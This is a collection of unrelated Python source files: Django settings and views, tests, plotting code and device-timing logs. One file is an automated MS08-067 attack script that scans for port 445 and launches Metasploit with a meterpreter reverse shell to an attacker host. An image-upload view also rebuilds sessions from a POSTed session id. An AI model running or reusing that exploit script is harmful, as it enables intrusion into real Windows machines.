log.info('@@#@ Initial boot time (power up to switch prompt) T0 is {}'.format(T0))
T1 = _convert_seconds_to_minutes(T1_sec)
log.info('@@#@ Incremental time for Meraki app to configure all interfaces T1 is {}'.format(T1))
T2 = _convert_seconds_to_minutes(T2_sec)
log.info('@@#@ Incremental time for Ping Success and Mtunnel UP T2 is {}'.format(T2))
T3 = _convert_seconds_to_minutes(T3_sec)
log.info('@@#@ Total time T3 is {}'.format(T3))
if reload_type == 'api':
log.info(banner('Calculate the time taken at each step'))
log.info('Reload API Start : {}'.format(api_start_time))
log.info('Device Offline : {}'.format(device_offline_time))
log.info('Device Online after reboot : {}'.format(device_online_time))
log.info('Device Port Connected Time : {}'.format(port_connected_time))
log.info('Device Prompt Time : {}'.format(T0))
reboot_req_time = (device_offline_time - api_start_time) / 60
dev_online_time = (device_online_time - device_offline_time) / 60
port_up_time = (device_online_time - port_connected_time) / 60
total_time_from_reboot_req = (port_connected_time - api_start_time) / 60
log.info(banner('RESULTS'))
log.info('REBOOT REQ TIME TAKEN : {}'.format(reboot_req_time))
log.info('DEVICE ONLINE AFTER REBOOT : {}'.format(dev_online_time))
log.info('PORT CONNECTED TIME : {}'.format(port_up_time))
log.info('DEVICE PROMPT TIME : {}'.format(T0))
log.info('TOTAL TIME TAKEN : {}'.format(total_time_from_reboot_req))
log.info('Reload Performed Successfully')
return 1
| StarcoderdataPython |
189841 | <filename>config.py
"""You would probably keep your configuration out of the git repo, but
this works for a simple script.
See the docs for information on Flask configuration.
"""
DATABASE_NAME = 'flask_mongo_example'
| StarcoderdataPython |
1740024 | from .base import *
import sys
import logging.config
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Must mention ALLOWED_HOSTS in production!
ALLOWED_HOSTS = ['127.0.0.1']
# Turn off debug while imported by Celery with a workaround
# See http://stackoverflow.com/a/4806384
if 'celery' in sys.argv[0]:
DEBUG = False
# Django Debug Toolbar
INSTALLED_APPS +=('debug_toolbar',)
MIDDLEWARE_CLASSES+=['debug_toolbar.middleware.DebugToolbarMiddleware']
#INSTALLED_APPS += ('debug_toolbar.apps.DebugToolbarConfig',)
# Show emails to console in DEBUG mode
#EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = env.str('EMAIL_HOST')
EMAIL_HOST_USER = env.str('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = env.str('EMAIL_HOST_PASSWORD')
EMAIL_PORT = env.int('EMAIL_PORT')
EMAIL_USE_SSL = env.bool('EMAIL_USE_SSL')
EMAIL_USE_TLS = env.bool('EMAIL_USE_TLS')
DEFAULT_FROM_EMAIL = 'MiDSystem <NO_REPLY@localhost>'
#db settings
#fix this for production
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in
# os.environ
#'default': env.db()
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'MiDSystem', # Or path to database file if using sqlite3.
'USER': 'midsystem', # Not used with sqlite3.
'PASSWORD': '***<PASSWORD>$$$', # Not used with sqlite3.
'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '3306', # Set to empty string for default. Not used with sqlite3.
}
}
# Log everything to the logs directory at the top
LOGFILE_ROOT = join(dirname(BASE_DIR), 'logs')
INTERNAL_IPS=('127.0.0.1')
def show_toolbar(request):
return True
DEBUG_TOOLBAR_CONFIG = {
"SHOW_TOOLBAR_CALLBACK" : show_toolbar,
}
#def show_toolbar(request):
# return True
#SHOW_TOOLBAR_CALLBACK = show_toolbar
# Reset logging
# http://www.caktusgroup.com/blog/2015/01/27/
# Django-Logging-Configuration-logging_config-default-settings-logger/
'''
LOGGING_CONFIG = None
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': (
'[%(asctime)s] %(levelname)s '
'[%(pathname)s:%(lineno)s] %(message)s'
),
'datefmt': "%d/%b/%Y %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'django_log_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': join(LOGFILE_ROOT, 'django.log'),
'formatter': 'verbose'
},
'proj_log_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': join(LOGFILE_ROOT, 'project.log'),
'formatter': 'verbose'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
}
},
'loggers': {
'django': {
'handlers': ['django_log_file', ],
'propagate': True,
'level': 'DEBUG',
},
# 'project': {
# 'handlers': ['proj_log_file', 'console', ],
# 'level': 'DEBUG',
# },
}
}
for app in LOCAL_APPS:
LOGGING['loggers'][app] = {
'handlers': ['proj_log_file', 'console', ],
'level': 'DEBUG',
}
logging.config.dictConfig(LOGGING)
'''
| StarcoderdataPython |
3270369 | <filename>readthedocs/builds/migrations/0029_add_time_fields.py
# Generated by Django 2.2.16 on 2020-11-18 16:26
from django.db import migrations
import django_extensions.db.fields
class Migration(migrations.Migration):
dependencies = [
('builds', '0028_add_delete_version_action'),
]
operations = [
migrations.AddField(
model_name='version',
name='created',
field=django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, null=True, verbose_name='created'),
),
migrations.AddField(
model_name='version',
name='modified',
field=django_extensions.db.fields.ModificationDateTimeField(auto_now=True, null=True, verbose_name='modified'),
),
]
| StarcoderdataPython |
118611 | <filename>tests/test_eul.py
import numpy as np
import pytest
from rotations import EulerAngles, AngleType, RotationMatrix
def test_constructors():
e1 = EulerAngles([0, 0, np.pi])
e2 = EulerAngles.from_angles(0, 0, np.pi)
e3 = EulerAngles.from_rotmat(RotationMatrix.default())
assert e1.roll == e2.roll
assert e1.pitch == e2.pitch
assert e1.yaw == pytest.approx(e2.yaw)
assert e3.roll == e3.pitch == e3.yaw == pytest.approx(0.0)
def test_properties():
e1 = EulerAngles([0, 0, np.pi / 2])
e2 = e1.copy()
e2.roll = 0.2
e2.pitch = -0.2
e1.yaw = 1.0
e2.yaw = 1.0
assert e1.roll < e2.roll
assert e1.pitch > e2.pitch
assert e1.yaw == e2.yaw
def test_wrong_constructors():
with pytest.raises(Exception):
_ = EulerAngles([1, 2, 3, 4])
def test_angle_types():
e1 = EulerAngles([0, 0, np.pi / 2])
e2 = EulerAngles.from_angles(0, 0, 90, AngleType.DEGREES)
assert e1.yaw == pytest.approx(e2.yaw)
assert e1.as_vector(AngleType.DEGREES)[2] == pytest.approx(90.0)
assert (e1.as_vector() == np.array([0, 0, np.pi / 2])).all()
def test_rotation_matrix():
e1 = EulerAngles([1, 2, 3])
R_known = np.array([[0.4119822, -0.8337377, -0.3676305],
[-0.0587266, -0.4269176, 0.9023816],
[-0.9092974, -0.3501755, -0.2248451]])
assert e1.R_bi() == pytest.approx(R_known)
def test_repr():
e1 = EulerAngles([1, 2, 3])
repr(e1)
| StarcoderdataPython |
1640559 | """Test module for Stack class."""
from stack import Stack
import pytest
# *****Fixtures*****
@pytest.fixture
def empty_stack():
"""Create an empty stack object."""
return Stack()
@pytest.fixture
def filled_stack():
"""Create a filled stack object."""
x = Stack([12, 31, 41, 32, 65, 76, 3, 9])
return x
# *****Tests*****
def test_stack_can_be_created():
"""Test that a stack can be instantiated."""
s = Stack()
assert isinstance(s, Stack)
def test_stack_can_be_created_with_iter():
"""Test a Stack can be created with an iterable."""
s = Stack([1, 2, 3, 4, 5, 6])
assert isinstance(s, Stack)
def test_add_works(empty_stack):
"""Test that empty_stack top value will be 99."""
empty_stack.add(99)
assert empty_stack.top.value == 99
def test_add_works_with_multiple_adds(empty_stack):
"""Test that adding 20 nodes, the top value will be 19."""
for x in range(20):
empty_stack.add(x)
assert empty_stack.top.value == 19
def test_height_method_works_on_empty_stack(empty_stack):
"""Test that height method returns 0 on empty Stack."""
assert empty_stack.height == 0
def test_height_works_while_adding_20_nodes(empty_stack):
"""Test that proper height is returned while adding 20 nodes."""
for x in range(20):
empty_stack.add(x)
assert empty_stack.height == x + 1
def test_height_method_works_on_filled_stack(filled_stack):
"""Test height method returns 8 on filled_stack."""
assert filled_stack.height == 8
def test_height_goes_up_when_add_to_stack(empty_stack):
"""Test that height returns 1 after adding to empty stack."""
empty_stack.add(9)
assert empty_stack.height == 1
def test_pop_method_returns_proper_value(filled_stack):
"""Test that pop returns 9 from filled stack."""
assert filled_stack.pop() == 9
| StarcoderdataPython |
1693283 | <gh_stars>1-10
# coding=utf-8
import nmap
import optparse
import os
def setexploit(configfile,rhost,lhost,lport):
configfile.write('use exploit/windows/smb/ms08_067_netapi\n')
configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configfile.write('set RHOST '+str(rhost)+'\n')
configfile.write('set LPORT '+str(lport)+'\n')
configfile.write('set LHOST '+lhost+'\n')
configfile.write('exploit \n')
configfile.close()
def sethande(configfile,lhost,lport):
configfile.write('use exploit/multi/handler\n')
configfile.write('set PAYLOAD windows/meterpreter/reverse_tcp \n')
configfile.write('set LPORT '+str(lport)+'\n')
configfile.write('set LHOST ' + str(lhost) + '\n')
configfile.write('set DisablePayloadHandler 1\n')
configfile.write('exploit -j -z\n')
def scan445(new_ip):
new_ip = str(new_ip)
# 实例化
nm = nmap.PortScanner()
# scan扫描方法
ping_scan_raw = nm.scan(hosts=new_ip,ports='445',arguments='-sS')
# 返回一个存活列表
list_ip = nm.all_hosts()
# print list_ip
# print ping_scan_raw
for list in list_ip:
host_status = ping_scan_raw['scan'][list]['status']['state']
port_status = ping_scan_raw['scan'][list]['tcp'][445]['state']
# print list + port_status
# print list + host_status
tlist = []
if host_status == 'up' and port_status == 'open':
tlist.append(list)
return tlist
else:
return None
def main():
parser = optparse.OptionParser()
parser.add_option('-t','--tag',dest = 'tag',help = 'tag')
parser.add_option('-l','--lhost',dest = 'lhost',help = 'lhost')
parser.add_option('-p','--lpost',dest = 'lport',help = 'lpost')
(options,args) = parser.parse_args()
if(options.tag == None) or (options.lhost == None) or (options.lport == None):
print "参数错误"
exit(0)
else:
ip = str(options.tag)
# t = ip.split('.')[3]
lhost = str(options.lhost)
lport = str(options.lport)
flag = scan445(ip)
# print flag
configfile = open('ms08_067.rc','w')
sethande(configfile,lhost,lport)
for target in flag:
setexploit(configfile,target,lhost,lport)
os.system('msfconsole -r ms08_067.rc')
# host0 = ip.split('.')[0]
# host1 = ip.split('.')[1]
# host2 = ip.split('.')[2]
# host = host0 + '.' + host1 + '.' + host2
# i = 1
# while i < 255:
# new_ip = host + '.' + str(i)
# # result = os.system("ping " + new_ip + " -c 1 -i 1")\
# flag = scan445(new_ip)
# if (flag == 1):
# print ip + " open"
# elif (flag == 0):
# print ip + " close"
# elif (flag == -1):
# print new_ip + 'no ping'
# i += 1
if __name__ == '__main__':
main()
| StarcoderdataPython |
38668 | from django.contrib.auth.models import User
from rollservice.models import DiceSequence
import rest_framework.test as rf_test
import rest_framework.status as status
import rest_framework.reverse as reverse
import hypothesis.extra.django
import hypothesis.strategies as strategies
import unittest
class DiceSeqStrategies:
dice_rolls = strategies.lists(
elements=strategies.sampled_from([4, 6, 8, 10, 12, 20, 100]),
min_size=1
)
user = strategies.just(dict(
username='dungeon_master',
email='<EMAIL>',
password='<PASSWORD>'
))
@strategies.composite
def seq_name(draw):
seq_number = draw(strategies.integers(min_value=1))
return f'Roll {seq_number}'
@strategies.composite
def dice_sequence(draw, seq_name=seq_name(), dice_rolls=dice_rolls):
seq_name = draw(seq_name)
dice_sequence = draw(dice_rolls)
return dict(
seq_name=seq_name,
dice_sequence=dice_sequence
)
dice_sequence_list = strategies.lists(elements=dice_sequence(), min_size=1)
@strategies.composite
def existing_uuid(draw, queryset):
max_value = len(queryset) - 1
index = draw(strategies.integers(min_value=0, max_value=max_value))
return queryset[index].uuid
non_existing_uuid = strategies.uuids()
invalid_uuid = strategies.text(max_size=100)
@strategies.composite
def existing_uuid_url(draw, queryset):
max_value = len(queryset) - 1
index = draw(strategies.integers(min_value=0, max_value=max_value))
uuid = queryset[index].uuid
url = reverse.reverse('dice-seq-by-uuid', args=[uuid])
return url
@strategies.composite
def non_existing_uuid_url(draw, queryset, non_existing_uuid=non_existing_uuid):
uuid = draw(non_existing_uuid)
url = reverse.reverse('dice-seq-by-uuid', args=[uuid])
return url
@strategies.composite
def invalid_uuid_url(draw, invalid_uuid=invalid_uuid):
uuid = draw(invalid_uuid)
url_root = reverse.reverse('dice-seq')
url = url_root + '/by_uuid/' + uuid + '/'
return url
class DiceSequenceByUUIDTests(hypothesis.extra.django.TestCase):
@classmethod
def setUpTestData(cls):
sequences = DiceSeqStrategies.dice_sequence_list.example()
new_user = DiceSeqStrategies.user.example()
owner = User.objects.create(**new_user)
for sequence in sequences:
dice_sequence = DiceSequence.objects.create(seq_name=sequence['seq_name'], owner=owner)
dice_sequence.sequence.set(sequence['dice_sequence'])
queryset = DiceSequence.objects.all()
client_class = rf_test.APIClient
@hypothesis.given(DiceSeqStrategies.existing_uuid_url(queryset=queryset))
def test_dice_seq_by_uuid_GET_with_existing_uuid_should_return_OK(self, url):
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
@hypothesis.given(DiceSeqStrategies.non_existing_uuid_url(queryset=queryset))
def test_dice_seq_by_uuid_GET_with_non_existing_uuid_should_return_NOT_FOUND(self, url):
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
@hypothesis.given(DiceSeqStrategies.invalid_uuid_url())
def test_dice_seq_by_uuid_GET_with_invalid_uuid_should_return_BAD_REQUEST(self, url):
response = self.client.get(url)
self.assertIn(response.status_code, [status.HTTP_404_NOT_FOUND, status.HTTP_400_BAD_REQUEST])
@hypothesis.given(strategies.one_of([
DiceSeqStrategies.existing_uuid_url(queryset=queryset),
DiceSeqStrategies.non_existing_uuid_url(queryset=queryset),
DiceSeqStrategies.invalid_uuid_url(),
]))
def test_dice_seq_by_uuid_GET_idempotent(self, url):
response1 = self.client.get(url)
response2 = self.client.get(url)
self.assertEqual(response1.status_code, response2.status_code)
| StarcoderdataPython |
9826 | # OpenWeatherMap API Key
weather_api_key = "MyOpenWeatherMapAPIKey"
# Google API Key
g_key = "MyGoogleKey" | StarcoderdataPython |
136846 | <filename>epitopedia/viz/figure.py
import seaborn as sns
import matplotlib.pyplot as plt
plt.rcParams.update({'font.size':20})
import pickle
import numpy as np
def zscores(std, mean, score):
return (std * score) + mean
def plot_dist(data, data_point, name,label="RMSD (Å)"):
# fig = plt.figure(figsize=(3,6))
# sns.set_theme(style='ticks', font_scale=1.75)
data = np.array(data)
std = np.std(data)
mean = np.average(data)
sns.displot(data, binwidth=.1,)#kind="kde", cut=0,bw_adjust=.25)
plt.xlabel(f"{label}\nGrey lines represent -1, 0 (mean) and 1 Std Dev\nRed line represents value for hit")
plt.axvline(x=zscores(std, mean, -1), color='gray')
plt.axvline(x=mean, color='gray')
plt.axvline(x=zscores(std, mean, 1), color='gray')
if data_point:
plt.axvline(zscores(std, mean, data_point), color='r')
fig = plt.gcf()
fig.set_size_inches(8, 4)
plt.tight_layout()
plt.savefig(name)
plt.close("all")
def plot_bivariate(lens,rmsds):
sns.displot(x=lens, y=rmsds, binwidth=(1, .1))
plt.savefig("plot_dist.png")
plt.close()
if __name__ == "__main__":
with open("/app/output/EPI_PDB_fragment_pairs_6XR8_A_exp.pickle", 'rb') as inhandle:
data = pickle.load(inhandle)
plot_bivariate(data["lens"], data["rmsds"])
| StarcoderdataPython |
1776519 | <filename>apps/base/migrations/0005_auto_20181120_1224.py
# Generated by Django 2.1.3 on 2018-11-20 12:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('base', '0004_auto_20181120_1112'),
]
operations = [
migrations.AddField(
model_name='user',
name='dp',
field=models.URLField(blank=True, max_length=1000, null=True),
),
migrations.AlterField(
model_name='user',
name='mobile_no',
field=models.CharField(blank=True, max_length=24, null=True),
),
migrations.AlterField(
model_name='user',
name='review',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='user',
name='social_url',
field=models.URLField(blank=True, max_length=1000, null=True),
),
]
| StarcoderdataPython |
3390898 | <reponame>stefanfoulis/django-image-filer
import os
from django.shortcuts import render_to_response
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from django.http import HttpResponseRedirect, HttpResponse, HttpResponseForbidden, HttpResponseBadRequest
from django.contrib.sessions.models import Session
from django.conf import settings
from django.db.models import Q
from django.core.exceptions import PermissionDenied
from models import Folder, Image, Clipboard, ClipboardItem
from models import tools
from models import FolderRoot, UnfiledImages, ImagesWithMissingData
from django.contrib.auth.models import User
from django import forms
from django.contrib import admin
class NewFolderForm(forms.ModelForm):
class Meta:
model = Folder
fields = ('name', )
def popup_status(request):
return request.REQUEST.has_key('_popup') or request.REQUEST.has_key('pop')
def selectfolder_status(request):
return request.REQUEST.has_key('select_folder')
def popup_param(request):
if popup_status(request):
return "?_popup=1"
else:
return ""
def _userperms(item, request):
r = []
ps = ['read', 'edit', 'add_children']
for p in ps:
attr = "has_%s_permission" % p
if hasattr(item, attr):
x = getattr(item, attr)(request)
if x:
r.append( p )
return r
@login_required
def directory_listing(request, folder_id=None, viewtype=None):
clipboard = tools.get_user_clipboard(request.user)
if viewtype=='images_with_missing_data':
folder = ImagesWithMissingData()
elif viewtype=='unfiled_images':
folder = UnfiledImages()
elif folder_id == None:
folder = FolderRoot()
else:
folder = Folder.objects.get(id=folder_id)
# search
def filter_folder(qs, terms=[]):
for term in terms:
qs = qs.filter(Q(name__icontains=term) | Q(owner__username__icontains=term) | Q(owner__first_name__icontains=term) | Q(owner__last_name__icontains=term) )
return qs
def filter_image(qs, terms=[]):
for term in terms:
qs = qs.filter( Q(name__icontains=term) | Q(original_filename__icontains=term ) | Q(owner__username__icontains=term) | Q(owner__first_name__icontains=term) | Q(owner__last_name__icontains=term) )
return qs
q = request.GET.get('q', None)
if q:
search_terms = q.split(" ")
else:
search_terms = []
limit_search_to_folder = request.GET.get('limit_search_to_folder', False) in (True, 'on')
if len(search_terms)>0:
if folder and limit_search_to_folder and not folder.is_root:
folder_qs = folder.get_descendants()
# TODO: check how folder__in=folder.get_descendats() performs in large trees
image_qs = Image.objects.filter(folder__in=folder.get_descendants())
else:
folder_qs = Folder.objects.all()
image_qs = Image.objects.all()
folder_qs = filter_folder(folder_qs, search_terms)
image_qs = filter_image(image_qs, search_terms)
show_result_count = True
else:
folder_qs = folder.children.all()
image_qs = folder.image_files.all()
show_result_count = False
folder_qs = folder_qs.order_by('name')
image_qs = image_qs.order_by('name')
folder_children = []
folder_files = []
for f in folder_qs:
f.perms = _userperms(f, request)
if hasattr(f, 'has_read_permission'):
if f.has_read_permission(request):
#print "%s has read permission for %s" % (request.user, f)
folder_children.append(f)
else:
pass#print "%s has NO read permission for %s" % (request.user, f)
else:
folder_children.append(f)
for f in image_qs:
f.perms = _userperms(f, request)
if hasattr(f, 'has_read_permission'):
if f.has_read_permission(request):
#print "%s has read permission for %s" % (request.user, f)
folder_files.append(f)
else:
pass#print "%s has NO read permission for %s" % (request.user, f)
else:
folder_files.append(f)
try:
permissions = {
'has_edit_permission': folder.has_edit_permission(request),
'has_read_permission': folder.has_read_permission(request),
'has_add_children_permission': folder.has_add_children_permission(request),
}
except:
permissions = {}
#print admin.site.root_path
return render_to_response('image_filer/directory_listing.html', {
'folder':folder,
'folder_children':folder_children,
'folder_files':folder_files,
'permissions': permissions,
'permstest': _userperms(folder, request),
'current_url': request.path,
'title': u'Directory listing for %s' % folder.name,
'search_string': ' '.join(search_terms),
'show_result_count': show_result_count,
'limit_search_to_folder': limit_search_to_folder,
'is_popup': popup_status(request),
'select_folder': selectfolder_status(request),
'root_path': "/%s" % admin.site.root_path, # needed in the admin/base.html template for logout links and stuff
}, context_instance=RequestContext(request))
@login_required
def edit_folder(request, folder_id):
# TODO: implement edit_folder view
folder=None
return render_to_response('image_filer/folder_edit.html', {
'folder':folder,
'is_popup': request.REQUEST.has_key('_popup') or request.REQUEST.has_key('pop'),
}, context_instance=RequestContext(request))
@login_required
def edit_image(request, folder_id):
# TODO: implement edit_image view
folder=None
return render_to_response('image_filer/image_edit.html', {
'folder':folder,
'is_popup': request.REQUEST.has_key('_popup') or request.REQUEST.has_key('pop'),
}, context_instance=RequestContext(request))
@login_required
def make_folder(request, folder_id=None):
if not folder_id:
folder_id = request.REQUEST.get('parent_id', None)
if folder_id:
folder = Folder.objects.get(id=folder_id)
else:
folder = None
if request.user.is_superuser:
pass
elif folder == None:
# regular users may not add root folders
raise PermissionDenied
elif not folder.has_add_children_permission(request):
# the user does not have the permission to add subfolders
raise PermissionDenied
if request.method == 'POST':
new_folder_form = NewFolderForm(request.POST)
if new_folder_form.is_valid():
new_folder = new_folder_form.save(commit=False)
new_folder.parent = folder
new_folder.owner = request.user
new_folder.save()
#print u"Saving folder %s as child of %s" % (new_folder, folder)
return HttpResponse('<script type="text/javascript">opener.dismissPopupAndReload(window);</script>')
else:
#print u"New Folder GET, parent %s" % folder
new_folder_form = NewFolderForm()
return render_to_response('image_filer/include/new_folder_form.html', {
'new_folder_form': new_folder_form,
'is_popup': request.REQUEST.has_key('_popup') or request.REQUEST.has_key('pop'),
}, context_instance=RequestContext(request))
class UploadFileForm(forms.ModelForm):
class Meta:
model=Image
#fields = ('file',)
from image_filer.utils.files import generic_handle_file
@login_required
def upload(request):
return render_to_response('image_filer/upload.html', {
'title': u'Upload files',
'is_popup': popup_status(request),
}, context_instance=RequestContext(request))
def ajax_upload(request, folder_id=None):
"""
receives an upload from the flash uploader and fixes the session
because of the missing cookie. Receives only one file at the time,
althow it may be a zip file, that will be unpacked.
"""
#print request.POST
# flashcookie-hack (flash does not submit the cookie, so we send the
# django sessionid over regular post
try:
engine = __import__(settings.SESSION_ENGINE, {}, {}, [''])
#session_key = request.POST.get('jsessionid')
session_key = request.POST.get('jsessionid')
request.session = engine.SessionStore(session_key)
request.user = User.objects.get(id=request.session['_auth_user_id'])
#print request.session['_auth_user_id']
#print session_key
#print engine
#print request.user
#print request.session
# upload and save the file
if not request.method == 'POST':
return HttpResponse("must be POST")
original_filename = request.POST.get('Filename')
file = request.FILES.get('Filedata')
#print request.FILES
#print original_filename, file
clipboard, was_clipboard_created = Clipboard.objects.get_or_create(user=request.user)
files = generic_handle_file(file, original_filename)
file_items = []
for ifile, iname in files:
try:
iext = os.path.splitext(iname)[1].lower()
except:
iext = ''
#print "extension: ", iext
if iext in ['.jpg','.jpeg','.png','.gif']:
imageform = UploadFileForm({'original_filename':iname,'owner': request.user.pk}, {'file':ifile})
if imageform.is_valid():
#print 'imageform is valid'
try:
image = imageform.save(commit=False)
image.save()
file_items.append(image)
except Exception, e:
print e
#print "save %s" % image
bi = ClipboardItem(clipboard=clipboard, file=image)
bi.save()
#sprint image
else:
pass#print imageform.errors
except Exception, e:
print e
raise e
return render_to_response('image_filer/include/clipboard_item_rows.html', {'items': file_items }, context_instance=RequestContext(request))
@login_required
def paste_clipboard_to_folder(request):
if request.method=='POST':
folder = Folder.objects.get( id=request.POST.get('folder_id') )
clipboard = Clipboard.objects.get( id=request.POST.get('clipboard_id') )
if folder.has_add_children_permission(request):
tools.move_files_from_clipboard_to_folder(clipboard, folder)
tools.discard_clipboard(clipboard)
else:
raise PermissionDenied
return HttpResponseRedirect( '%s%s' % (request.REQUEST.get('redirect_to', ''), popup_param(request) ) )
@login_required
def discard_clipboard(request):
if request.method=='POST':
clipboard = Clipboard.objects.get( id=request.POST.get('clipboard_id') )
tools.discard_clipboard(clipboard)
return HttpResponseRedirect( '%s%s' % (request.POST.get('redirect_to', ''), popup_param(request) ) )
@login_required
def delete_clipboard(request):
if request.method=='POST':
clipboard = Clipboard.objects.get( id=request.POST.get('clipboard_id') )
tools.delete_clipboard(clipboard)
return HttpResponseRedirect( '%s%s' % (request.POST.get('redirect_to', ''), popup_param(request) ) )
@login_required
def move_file_to_clipboard(request):
print "move file"
if request.method=='POST':
file_id = request.POST.get("file_id", None)
clipboard = tools.get_user_clipboard(request.user)
if file_id:
file = Image.objects.get(id=file_id)
if file.has_edit_permission(request):
tools.move_file_to_clipboard([file], clipboard)
else:
raise PermissionDenied
return HttpResponseRedirect( '%s%s' % (request.POST.get('redirect_to', ''), popup_param(request) ) )
@login_required
def clone_files_from_clipboard_to_folder(request):
if request.method=='POST':
clipboard = Clipboard.objects.get( id=request.POST.get('clipboard_id') )
folder = Folder.objects.get( id=request.POST.get('folder_id') )
tools.clone_files_from_clipboard_to_folder(clipboard, folder)
return HttpResponseRedirect( '%s%s' % (request.POST.get('redirect_to', ''), popup_param(request) ) )
class ImageExportForm(forms.Form):
FORMAT_CHOICES = (
('jpg', 'jpg'),
('png', 'png'),
('gif', 'gif'),
#('tif', 'tif'),
)
format = forms.ChoiceField(choices=FORMAT_CHOICES)
crop = forms.BooleanField(required=False)
upscale = forms.BooleanField(required=False)
width = forms.IntegerField()
height = forms.IntegerField()
import filters
@login_required
def export_image(request, image_id):
image = Image.objects.get(id=image_id)
if request.method=='POST':
form = ImageExportForm(request.POST)
if form.is_valid():
resize_filter = filters.ResizeFilter()
im = filters.Image.open(image.file.path)
format = form.cleaned_data['format']
if format=='png':
mimetype='image/jpg'
pil_format = 'PNG'
#elif format=='tif':
# mimetype='image/tiff'
# pil_format = 'TIFF'
elif format=='gif':
mimetype='image/gif'
pil_format = 'GIF'
else:
mimetype='image/jpg'
pil_format = 'JPEG'
im = resize_filter.render(im,
size_x=int(form.cleaned_data['width']),
size_y=int(form.cleaned_data['height']),
crop=form.cleaned_data['crop'],
upscale=form.cleaned_data['upscale']
)
response = HttpResponse(mimetype='%s' % mimetype)
response['Content-Disposition'] = 'attachment; filename=exported_image.%s' % format
im.save(response, pil_format)
return response
else:
form = ImageExportForm(initial={'crop': True, 'width': image.file.width, 'height':image.file.height})
return render_to_response('image_filer/image_export_form.html', {
'form': form,
'image': image
}, context_instance=RequestContext(request))
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.